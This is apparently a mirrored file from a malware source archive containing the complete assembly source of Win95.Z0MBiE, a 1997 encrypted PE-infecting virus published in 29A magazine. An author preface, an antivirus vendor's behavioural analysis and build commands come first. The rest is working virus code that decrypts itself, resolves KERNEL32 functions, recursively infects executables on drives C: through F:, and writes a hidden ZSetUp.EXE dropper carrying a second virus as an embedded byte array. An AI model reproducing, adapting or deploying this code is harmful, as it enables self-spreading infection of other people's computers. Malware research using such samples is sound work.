mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
980 lines
39 KiB
NASM
980 lines
39 KiB
NASM
;
|
|
; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
|
|
; ³ Win95.Z0MBiE ³
|
|
; ³ v1.01, by Z0MBiE ³
|
|
; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
|
|
;
|
|
; This is the first collaboration of the russian virus writer Z0MBiE to 29A,
|
|
; and also his first Win95 PE infector. It is an encrypted runtime PE infec-
|
|
; tor which, after having decrypted its body, locates KERNEL32.DLL and then
|
|
; looks in its export table for the address of the API functions used it the
|
|
; viral code. This virus has also the feature which consists on looking for
|
|
; files to infect in the Windows directory as well as in other units. PE in-
|
|
; fection consists on adding a new section (called .Z0MBiE) to infected exe-
|
|
; cutables and creating an entry point in it for the virus code. Last but
|
|
; not least, Win95.Z0MBiE, after having infected files in a given drive, in-
|
|
; serts a dropper called ZSetUp.EXE in the root directory. This file is ac-
|
|
; tually a dropper of the Z0MBiE.1922 virus, also included in this issue of
|
|
; 29A, in the "Viruses" section of the magazine. Its peculiarities are des-
|
|
; cribed there, together with the analysis of Igor Daniloff, same as the one
|
|
; which follows, describing the behavior of Win95.ZOMBiE.
|
|
;
|
|
;
|
|
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
|
|
; Win95.Zombie
|
|
;
|
|
; Igor Daniloff
|
|
; DialogueScience
|
|
;
|
|
; Win95.Zombie is a nondestructive nonresident encrypted virus which
|
|
; infects PortableExecutable EXE files. On starting an infected file,
|
|
; the virus decryptor explodes the main virus body and passes control
|
|
; to it. The main virus body determines the location of KERNEL32 Export
|
|
; Table in memory and saves in its code the address of WIN32 KERNEL API
|
|
; functions that are essential for infecting files.
|
|
;
|
|
; Then the virus determines the command line of the currently-loaded
|
|
; infected program and loads it once again through the WinExec function.
|
|
; The second virus copy then infects the system. The first virus copy
|
|
; (that started a second copy the infected program), after completing
|
|
; the WinExec procedure, returns control to the host program.
|
|
;
|
|
; To infect PE EXE files, the virus scans the Windows system folder and
|
|
; also takes peeps into all other folders in drives C:, D:, E:, and F:.
|
|
; On detecting a PE EXE file, the virus analyzes the file. If all is well,
|
|
; the file is infected. Win95.Zombie creates a new segment section .Z0MBiE
|
|
; in the PE header, sets an entry point to it, and appends a copy of the
|
|
; encrypted code at the file end which is within the limits of the region
|
|
; of this segment section. After infecting the logical drive, the virus
|
|
; creates a dropper file ZSetUp.EXE in the root directory and assigns it
|
|
; ARCHIVE and SYSTEM attributes. In this file, Win95.Zombie plants a
|
|
; Zombie.1922 virus code. The virus contains a few text strings:
|
|
;
|
|
; Z0MBiE 1.01 (c) 1997
|
|
; My 2nd virii for mustdie
|
|
; Tnx to S.S.R.
|
|
;
|
|
; Z0MBiE`1668 v1.00 (c) 1997 Z0MBiE
|
|
; Tnx to S.S.R.
|
|
; ShadowRAM/Virtual Process Infector
|
|
; ShadowRAM Technology (c) 1996,97 Z0MBiE
|
|
;
|
|
; code................1398
|
|
; viriisize...........4584
|
|
; virtsize............8936
|
|
;
|
|
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
|
|
;
|
|
;
|
|
; Compiling it
|
|
; ÄÄÄÄÄÄÄÄÄÄÄÄ
|
|
; tasm32 -ml -m5 -q -zn zombie.asm
|
|
; tlink32 -Tpe -c -x -aa zombie.obj,,, import32.lib
|
|
; pewrsec zombie.exe
|
|
;
|
|
; - -[ZOMBIE.ASM] - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
|
|
|
|
.386
|
|
locals
|
|
jumps
|
|
.model flat
|
|
|
|
extrn ExitProcess:PROC
|
|
extrn MessageBoxA:PROC
|
|
|
|
kernel equ 0BFF70000H
|
|
|
|
FILE_ID equ 'Z0'
|
|
PORT_ID equ 'Z'
|
|
|
|
.data
|
|
|
|
sux db 'mustdie'
|
|
|
|
.code
|
|
start:
|
|
call codestart
|
|
|
|
lea ebp, [eax - 401000H]
|
|
lea edx, codestart[ebp]
|
|
cryptn equ (viriisize-decrsize+3) / 4
|
|
mov ecx, cryptn
|
|
@@1: neg dword ptr [edx]
|
|
xor dword ptr [edx], 12345678h
|
|
xorword equ dword ptr $-4
|
|
sub edx, -4
|
|
loop @@1
|
|
jmp codestart
|
|
|
|
align 4
|
|
decrsize equ $-start
|
|
|
|
codestart: lea ebp, [eax - 401000H]
|
|
sub eax, 12345678h
|
|
subme equ dword ptr $-4
|
|
push eax
|
|
|
|
call analizekernel
|
|
|
|
call first
|
|
|
|
in al, 81h
|
|
cmp al, PORT_ID
|
|
je exit_to_program
|
|
|
|
in al, 80h
|
|
cmp al, PORT_ID
|
|
je infect
|
|
|
|
mov al, PORT_ID
|
|
out 80h, al
|
|
|
|
call ExecExe
|
|
|
|
exit_to_program: ret
|
|
|
|
infect: mov al, -1
|
|
out 80h, al
|
|
|
|
; call _GetModuleHandleA
|
|
; push 9
|
|
; push eax
|
|
; call _SetPriorityClass
|
|
|
|
; infect windows directory
|
|
|
|
lea edx, infdir[ebp]
|
|
call getwindir
|
|
lea edx, infdir[ebp]
|
|
call setdir
|
|
call infectdir
|
|
|
|
; recursive infect
|
|
|
|
lea edx, drive_c[ebp]
|
|
call recinfect1st
|
|
call createsetup
|
|
|
|
lea edx, drive_d[ebp]
|
|
call recinfect1st
|
|
call createsetup
|
|
|
|
lea edx, drive_e[ebp]
|
|
call recinfect1st
|
|
call createsetup
|
|
|
|
lea edx, drive_f[ebp]
|
|
call recinfect1st
|
|
call createsetup
|
|
|
|
mov al, PORT_ID
|
|
out 81h, al
|
|
|
|
exit_to_mustdie: push -1
|
|
call _ExitProcess
|
|
|
|
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ subprograms ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
|
|
|
createsetup: lea edx, zsetup[ebp]
|
|
call createfile
|
|
|
|
lea edx, z[ebp]
|
|
mov ecx, z_size
|
|
call writefile
|
|
|
|
call closefile
|
|
|
|
ret
|
|
|
|
first: pop edi
|
|
mov byte ptr [edi-5], 0b9h ; mov ecx, xxxxxxxx
|
|
mov byte ptr start[ebp], 0b9h
|
|
|
|
call infectfile
|
|
jmp exit_to_mustdie
|
|
|
|
ExecExe: call _GetCommandLineA
|
|
SW_NORMAL equ 1
|
|
push SW_NORMAL
|
|
push eax
|
|
call _WinExec
|
|
ret
|
|
|
|
recinfect1st: call setdir
|
|
|
|
recinfect: call infectdir
|
|
|
|
lea eax, win32_data_thang[ebp]
|
|
push eax
|
|
lea eax, dirfiles[ebp]
|
|
push eax
|
|
call _FindFirstFileA
|
|
mov edi, eax
|
|
inc eax
|
|
jz @@nomorefiles
|
|
|
|
@@processfile: lea eax, fileattr[ebp]
|
|
mov al, [eax]
|
|
cmp al, 10h ; directory ?
|
|
jne @@findnext
|
|
|
|
lea edx, fullname[ebp]
|
|
cmp byte ptr [edx], '.'
|
|
je @@findnext
|
|
call setdir
|
|
|
|
push edi
|
|
lea edx, fullname[ebp]
|
|
call recinfect
|
|
pop edi
|
|
|
|
lea edx, prev_dir[ebp]
|
|
call setdir
|
|
|
|
@@findnext: lea eax, win32_data_thang[ebp]
|
|
push eax
|
|
push edi
|
|
call _FindNextFileA
|
|
|
|
or eax, eax
|
|
jnz @@processfile
|
|
|
|
@@nomorefiles: ret
|
|
|
|
nokerneldll:
|
|
nofunction:
|
|
exit: jmp $
|
|
|
|
analizekernel: mov esi, kernel
|
|
@@1: ; cmp esi, kernel + 040000h
|
|
; ja nokernelfunc
|
|
lea edi, kernel_sign[ebp]
|
|
mov ecx, kernel_sign_size
|
|
rep cmpsb
|
|
jne @@1
|
|
|
|
kernelfound: sub esi, kernel_sign_size
|
|
mov kernel_call[ebp], esi
|
|
|
|
mov esi, kernel
|
|
lodsw
|
|
cmp ax, 'ZM'
|
|
jne nokerneldll
|
|
|
|
add esi, 003Ch-2
|
|
lodsd
|
|
|
|
lea esi, [esi + eax - 3ch - 4]
|
|
lodsd
|
|
cmp eax, 'EP'
|
|
jne nokerneldll
|
|
|
|
add esi, 78h-4 ; esi=.edata
|
|
|
|
lodsd
|
|
add eax, kernel + 10h
|
|
xchg esi, eax
|
|
|
|
lodsd
|
|
lodsd
|
|
lodsd
|
|
mov funcnum[ebp], eax
|
|
|
|
lodsd
|
|
add eax, kernel
|
|
mov entrypointptr[ebp], eax
|
|
|
|
lodsd
|
|
add eax, kernel
|
|
mov nameptr[ebp], eax
|
|
|
|
lodsd
|
|
add eax, kernel
|
|
mov ordinalptr[ebp], eax
|
|
|
|
lea edx, names[ebp]
|
|
lea edi, fns[ebp]
|
|
|
|
@@1: push edi
|
|
call findfunction
|
|
pop edi
|
|
|
|
inc edi ; 68
|
|
stosd
|
|
add edi, 6 ; jmp kernel_call[ebp]
|
|
|
|
mov edx, esi
|
|
|
|
cmp byte ptr [esi], 0
|
|
jne @@1
|
|
|
|
ret
|
|
|
|
findfunction: mov ecx, 12345678h
|
|
funcnum equ dword ptr $-4
|
|
xor ebx, ebx
|
|
|
|
findnextfunc: mov esi, edx
|
|
|
|
mov edi, [ebx + 12345678h]
|
|
nameptr equ dword ptr $-4
|
|
add edi, kernel
|
|
|
|
@@2: cmpsb
|
|
jne @@1
|
|
|
|
cmp byte ptr [esi-1], 0
|
|
jne @@2
|
|
|
|
; found
|
|
|
|
shr ebx, 1
|
|
movzx eax, word ptr [ebx + 12345678h]
|
|
ordinalptr equ dword ptr $-4
|
|
shl eax, 2
|
|
mov eax, [eax + 12345678h]
|
|
entrypointptr equ dword ptr $-4
|
|
add eax, kernel
|
|
|
|
ret
|
|
|
|
@@1: add ebx, 4
|
|
loop findnextfunc
|
|
|
|
jmp nofunction
|
|
|
|
|
|
infectdir: lea eax, win32_data_thang[ebp]
|
|
push eax
|
|
lea eax, exefiles[ebp]
|
|
push eax
|
|
call _FindFirstFileA
|
|
|
|
mov searchhandle[ebp], eax
|
|
inc eax
|
|
jz @@exit
|
|
|
|
@@next: call infectfile
|
|
|
|
lea eax, win32_data_thang[ebp]
|
|
push eax
|
|
push 12345678h
|
|
searchhandle equ dword ptr $-4
|
|
call _FindNextFileA
|
|
|
|
or eax, eax
|
|
jnz @@next
|
|
|
|
@@exit: ret
|
|
|
|
; input: ECX=file attr
|
|
; EDX=file
|
|
; output: EAX=handle
|
|
|
|
openfile: push 0
|
|
push ecx
|
|
push 3 ; OPEN_EXISTING
|
|
push 0
|
|
push 0
|
|
push 80000000h + 40000000h
|
|
push edx
|
|
call _CreateFileA
|
|
mov handle[ebp], eax
|
|
ret
|
|
|
|
; input: EDX=file
|
|
; output: EAX=handle
|
|
|
|
createfile: push 0
|
|
push ecx
|
|
push 1 ; CREATE
|
|
push 0
|
|
push 0
|
|
push 80000000h + 40000000h
|
|
push edx
|
|
call _CreateFileA
|
|
mov handle[ebp], eax
|
|
ret
|
|
|
|
seekfile: push 0
|
|
push 0
|
|
push edx
|
|
push handle[ebp]
|
|
call _SetFilePointer
|
|
ret
|
|
|
|
closefile: push handle[ebp]
|
|
call _CloseHandle
|
|
ret
|
|
|
|
; input: ECX=bytes to read
|
|
; EDX=buf
|
|
|
|
readfile: push 0
|
|
lea eax, bytesread[ebp]
|
|
push eax
|
|
push ecx
|
|
push edx
|
|
push handle[ebp]
|
|
call _ReadFile
|
|
ret
|
|
|
|
; input: ECX=bytes to read
|
|
; EDX=buf
|
|
|
|
writefile: push 0
|
|
lea eax, bytesread[ebp]
|
|
push eax
|
|
push ecx
|
|
push edx
|
|
push handle[ebp]
|
|
call _WriteFile
|
|
ret
|
|
|
|
; input: EDX=offset directory (256 byte)
|
|
|
|
getdir: cld
|
|
push edx
|
|
push 255
|
|
call _GetCurrentDirectoryA
|
|
ret
|
|
|
|
; input: EDX=directory
|
|
|
|
setdir: push edx
|
|
call _SetCurrentDirectoryA
|
|
ret
|
|
|
|
getwindir: cld
|
|
push 255
|
|
push edx
|
|
call _GetWindowsDirectoryA
|
|
ret
|
|
|
|
infectfile: in al, 82h
|
|
cmp al, PORT_ID
|
|
jne @@continue
|
|
|
|
lea eax, fullname[ebp]
|
|
cmp dword ptr [eax], 'BM0Z'
|
|
jne @@exit
|
|
|
|
@@continue: mov ecx, fileattr[ebp]
|
|
lea edx, fullname[ebp]
|
|
call openfile
|
|
|
|
inc eax
|
|
jz @@exit
|
|
|
|
; goto the dword that stores the location of the pe header
|
|
|
|
mov edx, 3Ch
|
|
call seekfile
|
|
|
|
; read in the location of the pe header
|
|
|
|
mov ecx, 4
|
|
lea edx, peheaderoffset[ebp]
|
|
call readfile
|
|
|
|
; goto the pe header
|
|
mov edx, peheaderoffset[ebp]
|
|
call seekfile
|
|
|
|
; read in enuff to calculate the full size of the pe header and object table
|
|
|
|
mov ecx, 256
|
|
lea edx, peheader[ebp]
|
|
call readfile
|
|
|
|
; make sure it is a pe header and is not already infected
|
|
cmp dword ptr peheader[ebp],'EP'
|
|
jne @@close
|
|
cmp word ptr peheader[ebp] + 4ch, FILE_ID
|
|
je @@close
|
|
cmp dword ptr peheader[ebp] + 52, 00400000h
|
|
jne @@close
|
|
|
|
; go back to the start of the pe header
|
|
mov edx, peheaderoffset[ebp]
|
|
call seekfile
|
|
|
|
; read in the whole pe header and object table
|
|
lea edx, peheader[ebp]
|
|
mov ecx, headersize[ebp]
|
|
cmp ecx, maxbufsize
|
|
ja @@close
|
|
call readfile
|
|
|
|
mov word ptr peheader[ebp] + 4ch, FILE_ID
|
|
|
|
; locate offset of object table
|
|
xor eax, eax
|
|
mov ax, NtHeaderSize[ebp]
|
|
add eax, 18h
|
|
mov objecttableoffset[ebp],eax
|
|
|
|
; calculate the offset of the last (null) object in the object table
|
|
mov esi, objecttableoffset[ebp]
|
|
lea eax, peheader[ebp]
|
|
add esi, eax
|
|
xor eax, eax
|
|
mov ax, numObj[ebp]
|
|
mov ecx, 40
|
|
xor edx, edx
|
|
mul ecx
|
|
add esi, eax
|
|
|
|
inc numObj[ebp] ; inc the number of objects
|
|
|
|
lea edi, newobject[ebp]
|
|
xchg edi,esi
|
|
|
|
; calculate the Relative Virtual Address (RVA) of the new object
|
|
|
|
mov eax, [edi-5*8+8]
|
|
add eax, [edi-5*8+12]
|
|
mov ecx, objalign[ebp]
|
|
xor edx,edx
|
|
div ecx
|
|
inc eax
|
|
mul ecx
|
|
mov RVA[ebp], eax
|
|
|
|
; calculate the physical size of the new object
|
|
mov ecx, filealign[ebp]
|
|
mov eax, viriisize
|
|
xor edx, edx
|
|
div ecx
|
|
inc eax
|
|
mul ecx
|
|
mov physicalsize[ebp],eax
|
|
|
|
; calculate the virtual size of the new object
|
|
mov ecx, objalign[ebp]
|
|
mov eax, virtsize
|
|
xor edx,edx
|
|
div ecx
|
|
inc eax
|
|
mul ecx
|
|
mov virtualsize[ebp],eax
|
|
|
|
; calculate the physical offset of the new object
|
|
mov eax,[edi-5*8+20]
|
|
add eax,[edi-5*8+16]
|
|
mov ecx, filealign[ebp]
|
|
xor edx,edx
|
|
div ecx
|
|
inc eax
|
|
mul ecx
|
|
mov physicaloffset[ebp],eax
|
|
|
|
; update the image size (the size in memory) of the file
|
|
mov eax, virtsize
|
|
add eax, imagesize[ebp]
|
|
mov ecx, objalign[ebp]
|
|
xor edx, edx
|
|
div ecx
|
|
inc eax
|
|
mul ecx
|
|
mov imagesize[ebp],eax
|
|
|
|
; copy the new object into the object table
|
|
mov ecx, 40/4
|
|
rep movsd
|
|
|
|
; calculate the entrypoint RVA
|
|
mov eax, RVA[ebp]
|
|
|
|
mov ebx, entrypointRVA[ebp]
|
|
mov entrypointRVA[ebp], eax
|
|
|
|
sub eax, ebx
|
|
|
|
; Set the value needed to return to the host
|
|
mov subme[ebp], eax
|
|
|
|
; go back to the start of the pe header
|
|
mov edx, peheaderoffset[ebp]
|
|
call seekfile
|
|
|
|
; write the pe header and object table to the file
|
|
mov ecx, headersize[ebp]
|
|
lea edx, peheader[ebp]
|
|
call writefile
|
|
|
|
; move to the physical offset of the new object
|
|
mov edx, physicaloffset[ebp]
|
|
call seekfile
|
|
|
|
; write the virus code to the new object
|
|
|
|
call random
|
|
mov xorword[ebp], eax
|
|
|
|
lea edx, start[ebp]
|
|
mov ecx, decrsize
|
|
call writefile
|
|
|
|
lea esi, codestart[ebp]
|
|
lea edi, buf[ebp]
|
|
mov ecx, cryptn
|
|
@@1: lodsd
|
|
xor eax, xorword[ebp]
|
|
neg eax
|
|
stosd
|
|
loop @@1
|
|
|
|
lea edx, buf[ebp]
|
|
mov ecx, viriisize-decrsize
|
|
call writefile
|
|
|
|
@@close: call closefile
|
|
|
|
@@exit: ret
|
|
|
|
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 32-bit random number generator ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
|
|
|
; output: eax=rnd
|
|
; zf=rnd(2)
|
|
|
|
random: call random16bit
|
|
shl eax, 16
|
|
|
|
random16bit: push ebx
|
|
mov bx, 1234h
|
|
rndword equ word ptr $-2
|
|
in al, 40h
|
|
xor bl, al
|
|
in al, 40h
|
|
add bh, al
|
|
in al, 41h
|
|
sub bl, al
|
|
in al, 41h
|
|
xor bh, al
|
|
in al, 42h
|
|
add bl, al
|
|
in al, 42h
|
|
sub bh, al
|
|
mov rndword[ebp], bx
|
|
xchg bx, ax
|
|
pop ebx
|
|
test al, 1
|
|
ret
|
|
|
|
; input: eax
|
|
; output: eax=rnd(eax)
|
|
; zf=rnd(2)
|
|
|
|
rnd: push ebx
|
|
push edx
|
|
xchg ebx, eax
|
|
call random
|
|
xor edx, edx
|
|
div ebx
|
|
xchg edx, eax
|
|
pop edx
|
|
pop ebx
|
|
test al, 1
|
|
ret
|
|
|
|
|
|
codesize equ $-start
|
|
|
|
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ data area ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
|
|
|
kernel_sign: pushfd ; <- kernel
|
|
cld
|
|
push eax
|
|
push ebx
|
|
push edx
|
|
kernel_sign_size equ $-kernel_sign
|
|
|
|
kernel_call dd ?
|
|
|
|
names: db 'ExitProcess',0
|
|
db 'FindFirstFileA',0
|
|
db 'FindNextFileA',0
|
|
db 'CreateFileA',0
|
|
db 'SetFilePointer',0
|
|
db 'ReadFile',0
|
|
db 'WriteFile',0
|
|
db 'CloseHandle',0
|
|
db 'GetCurrentDirectoryA',0
|
|
db 'SetCurrentDirectoryA',0
|
|
db 'GetWindowsDirectoryA',0
|
|
db 'GetCommandLineA',0
|
|
db 'WinExec',0
|
|
db 'SetPriorityClass',0
|
|
db 'GetModuleHandleA',0
|
|
db 0
|
|
|
|
fns:
|
|
def_fn macro name
|
|
_&name&: db 68h
|
|
fn_&name& dd ?
|
|
jmp kernel_call[ebp]
|
|
endm
|
|
|
|
def_fn ExitProcess
|
|
def_fn FindFirstFileA
|
|
def_fn FindNextFileA
|
|
def_fn CreateFileA
|
|
def_fn SetFilePointer
|
|
def_fn ReadFile
|
|
def_fn WriteFile
|
|
def_fn CloseHandle
|
|
def_fn GetCurrentDirectoryA
|
|
def_fn SetCurrentDirectoryA
|
|
def_fn GetWindowsDirectoryA
|
|
def_fn GetCommandLineA
|
|
def_fn WinExec
|
|
def_fn SetPriorityClass
|
|
def_fn GetModuleHandleA
|
|
|
|
bytesread dd ?
|
|
|
|
drive_c db 'C:\',0
|
|
drive_d db 'D:\',0
|
|
drive_e db 'E:\',0
|
|
drive_f db 'F:\',0
|
|
|
|
exefiles db '*.EXE',0
|
|
dirfiles db '*.',0
|
|
|
|
prev_dir db '..',0
|
|
|
|
win32_data_thang:
|
|
fileattr dd 0
|
|
createtime dd 0,0
|
|
lastaccesstime dd 0,0
|
|
lastwritetime dd 0,0
|
|
filesize dd 0,0
|
|
resv dd 0,0
|
|
fullname db 'Z0MB.EXE',256-8 dup (0)
|
|
realname db 256 dup (0)
|
|
|
|
handle dd ?
|
|
|
|
peheaderoffset dd ?
|
|
objecttableoffset dd ?
|
|
|
|
newobject: ;1234567 8
|
|
oname db '.Z0MBiE',0
|
|
virtualsize dd 0
|
|
RVA dd 0
|
|
physicalsize dd 0
|
|
physicaloffset dd 0
|
|
reserved dd 0,0,0
|
|
objectflags db 40h,0,0,0c0h
|
|
|
|
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ messages ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
|
|
|
db 13,10,'Z0MBiE 1.01 (c) 1997',13,10
|
|
db 'My 2nd virii for mustdie',13,10
|
|
db 'Tnx to S.S.R.',13,10
|
|
|
|
m1 macro n
|
|
if n ge 100000
|
|
db n / 10000/10 mod 10 + '0'
|
|
else
|
|
db '.'
|
|
endif
|
|
if n ge 10000
|
|
db n / 10000 mod 10 + '0'
|
|
else
|
|
db '.'
|
|
endif
|
|
if n ge 1000
|
|
db n / 1000 mod 10 + '0'
|
|
else
|
|
db '.'
|
|
endif
|
|
db n / 100 mod 10 + '0'
|
|
db n / 10 mod 10 + '0'
|
|
db n / 1 mod 10 + '0',13,10
|
|
endm
|
|
|
|
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
|
zsetup db '\ZSetUp.EXE',0
|
|
z:
|
|
include z.inc ; Z0MBiE.1922
|
|
z_size equ $-z
|
|
; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
|
|
|
db 13,10
|
|
db 'code..............'
|
|
m1 codesize
|
|
db 'viriisize.........'
|
|
m1 viriisize
|
|
db 'virtsize..........'
|
|
m1 virtsize
|
|
|
|
peheader:
|
|
signature dd 0
|
|
cputype dw 0
|
|
numObj dw 0
|
|
dd 3 dup (0)
|
|
NtHeaderSize dw 0
|
|
Flags dw 0
|
|
dd 4 dup (0)
|
|
entrypointRVA dd 0
|
|
dd 3 dup (0)
|
|
objalign dd 0
|
|
filealign dd 0
|
|
dd 4 dup (0)
|
|
imagesize dd 0
|
|
headersize dd 0
|
|
peheader_size equ $-peheader
|
|
|
|
align 4
|
|
viriisize equ $-start
|
|
|
|
infdir db 256 dup (?)
|
|
|
|
maxbufsize equ 4096
|
|
buf db maxbufsize dup (?)
|
|
|
|
virtsize equ $-start
|
|
end start
|
|
|
|
; - -[Z.INC]- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8
|
|
|
|
abc_size equ 1922 ; size in bytes
|
|
abc_num equ 1922 ; size in elements
|
|
|
|
abc db 0e9h,010h,001h,026h,0a0h,028h,000h,0f6h,0d0h,02eh,030h,006h,022h,001h
|
|
db 0beh,02bh,001h,08bh,0feh,0b9h,008h,000h,02eh,0ach,040h,0d1h,0e3h,00bh,0d8h
|
|
db 0e2h,0f7h,02eh,088h,01dh,047h,081h,0ffh,0adh,008h,075h,0eah,0ebh,000h,0e8h
|
|
db 056h,006h,0b8h,081h,0f0h,0cdh,013h,03dh,08ch,092h,074h,003h,0e8h,0d8h,000h
|
|
db 08ch,0c1h,083h,0c1h,010h,0b8h,034h,012h,003h,0c1h,08eh,0d0h,0bch,034h,012h
|
|
db 0b8h,034h,012h,003h,0c1h,050h,068h,034h,012h,033h,0c0h,0cbh,053h,0bbh,034h
|
|
db 012h,0e4h,040h,032h,0d8h,0e4h,040h,002h,0f8h,0e4h,041h,02ah,0d8h,0e4h,041h
|
|
db 032h,0f8h,0e4h,042h,002h,0d8h,0e4h,042h,02ah,0f8h,02eh,089h,01eh,058h,001h
|
|
db 093h,05bh,0a8h,001h,0c3h,053h,052h,093h,0e8h,0d4h,0ffh,033h,0d2h,0f7h,0f3h
|
|
db 092h,05ah,05bh,0a8h,001h,0c3h,051h,0b1h,059h,0e8h,04eh,000h,02eh,088h,02eh
|
|
db 0afh,001h,041h,0e8h,045h,000h,02eh,088h,02eh,0b5h,001h,041h,0e8h,03ch,000h
|
|
db 02eh,088h,02eh,0bbh,001h,059h,0c3h,090h,051h,0b9h,059h,000h,0e8h,03ah,000h
|
|
db 041h,0b5h,012h,0e8h,034h,000h,041h,0b5h,012h,0e8h,02eh,000h,059h,0c3h,051h
|
|
db 0b1h,059h,02eh,08ah,02eh,0afh,001h,080h,0e5h,08fh,080h,0cdh,030h,0e8h,01bh
|
|
db 000h,041h,0b5h,033h,0e8h,015h,000h,041h,0b5h,033h,0e8h,00fh,000h,059h,0c3h
|
|
db 066h,050h,052h,0e8h,014h,000h,0ech,08ah,0e8h,05ah,066h,058h,0c3h,066h,050h
|
|
db 052h,0e8h,007h,000h,08ah,0c5h,0eeh,05ah,066h,058h,0c3h,066h,0b8h,000h,000h
|
|
db 000h,080h,08ah,0c1h,024h,0fch,0bah,0f8h,00ch,066h,0efh,080h,0c2h,004h,08ah
|
|
db 0c1h,024h,003h,002h,0d0h,0c3h,01eh,006h,00eh,01fh,0fah,0fch,0e8h,070h,0ffh
|
|
db 0a0h,0afh,001h,0feh,0c0h,074h,058h,0e8h,0b8h,000h,075h,053h,0e8h,053h,000h
|
|
db 074h,00bh,0e8h,074h,000h,074h,006h,0e8h,07ch,000h,074h,001h,0c3h,0e8h,086h
|
|
db 0ffh,0b8h,042h,000h,0e8h,03bh,0ffh,003h,0e8h,083h,0c5h,00fh,083h,0e5h,0f0h
|
|
db 0c1h,0edh,004h,08ch,0c0h,003h,0c5h,02dh,010h,000h,08eh,0c0h,0bfh,000h,001h
|
|
db 0c6h,006h,082h,008h,0eah,0c7h,006h,083h,008h,017h,003h,08ch,006h,085h,008h
|
|
db 08ch,006h,0b6h,005h,0beh,000h,001h,0b9h,007h,008h,0f3h,0a4h,0e8h,035h,003h
|
|
db 0e8h,032h,0ffh,033h,0c0h,007h,01fh,0c3h,068h,000h,0c0h,007h,033h,0ffh,032h
|
|
db 0d2h,026h,08ah,075h,002h,0d1h,0e2h,073h,002h,0b6h,080h,081h,0eah,069h,008h
|
|
db 033h,0c0h,08bh,0efh,0b9h,025h,004h,0f3h,0afh,074h,004h,03bh,0fah,076h,0f3h
|
|
db 0c3h,0b8h,030h,011h,0b7h,002h,0cdh,010h,08ch,0c0h,03dh,000h,0c0h,0c3h,068h
|
|
db 000h,0c0h,007h,033h,0ffh,0b9h,00eh,000h,032h,0c0h,0f3h,0aeh,075h,015h,0b9h
|
|
db 010h,000h,0f3h,0aeh,026h,081h,07dh,0ffh,07eh,081h,075h,008h,026h,081h,07dh
|
|
db 00dh,07eh,0ffh,074h,006h,081h,0ffh,000h,0f0h,076h,0dch,08bh,0efh,0c3h,0b4h
|
|
db 013h,0cdh,02fh,08ch,0c1h,02eh,089h,01eh,02bh,003h,02eh,08ch,006h,02dh,003h
|
|
db 0cdh,02fh,081h,0f9h,000h,0f0h,0c3h,03dh,081h,0f0h,074h,019h,03dh,000h,04bh
|
|
db 074h,00fh,080h,0fch,043h,074h,00ah,080h,0fch,03dh,074h,005h,0eah,000h,000h
|
|
db 000h,000h,0e8h,048h,000h,0ebh,0f6h,0b8h,08ch,092h,0cfh,03dh,081h,0f0h,074h
|
|
db 0f7h,0e8h,0a2h,0feh,0e8h,089h,002h,02eh,0a3h,05ch,005h,0e8h,082h,0feh,09ch
|
|
db 09ah,000h,000h,000h,000h,09ch,0e8h,08eh,0feh,02eh,080h,03eh,05dh,005h,002h
|
|
db 075h,00dh,026h,081h,03fh,04dh,05ah,075h,003h,0e8h,0e4h,001h,0e8h,012h,002h
|
|
db 0e8h,060h,002h,0e8h,05dh,0feh,09dh,0cah,002h,000h,09ch,02eh,0ffh,01eh,00ah
|
|
db 003h,0c3h,0e8h,065h,0feh,02eh,0c6h,006h,0abh,001h,0c3h,060h,01eh,006h,0fch
|
|
db 0b8h,000h,03dh,0e8h,0e6h,0ffh,00fh,082h,066h,001h,093h,0b4h,03fh,00eh,01fh
|
|
db 0bah,087h,008h,0b9h,040h,000h,0e8h,0d4h,0ffh,03bh,0c1h,00fh,085h,04dh,001h
|
|
db 0a1h,087h,008h,03dh,04dh,05ah,074h,007h,03dh,05ah,04dh,00fh,085h,03eh,001h
|
|
db 080h,03eh,099h,008h,069h,00fh,084h,035h,001h,0b8h,000h,042h,033h,0c9h,08bh
|
|
db 016h,08fh,008h,0c1h,0e2h,004h,0e8h,0a7h,0ffh,0b4h,03fh,0bah,0bdh,003h,0b9h
|
|
db 002h,000h,0e8h,09ch,0ffh,03bh,0c1h,00fh,085h,015h,001h,0b8h,034h,012h,040h
|
|
db 00fh,084h,00dh,001h,053h,0b8h,020h,012h,0cdh,02fh,026h,08ah,01dh,0b8h,016h
|
|
db 012h,0cdh,02fh,05bh,026h,08bh,055h,013h,026h,08bh,045h,011h,00ah,0c0h,00fh
|
|
db 084h,0f5h,000h,0b9h,0e8h,003h,0f7h,0f1h,00bh,0d2h,00fh,084h,0eah,000h,026h
|
|
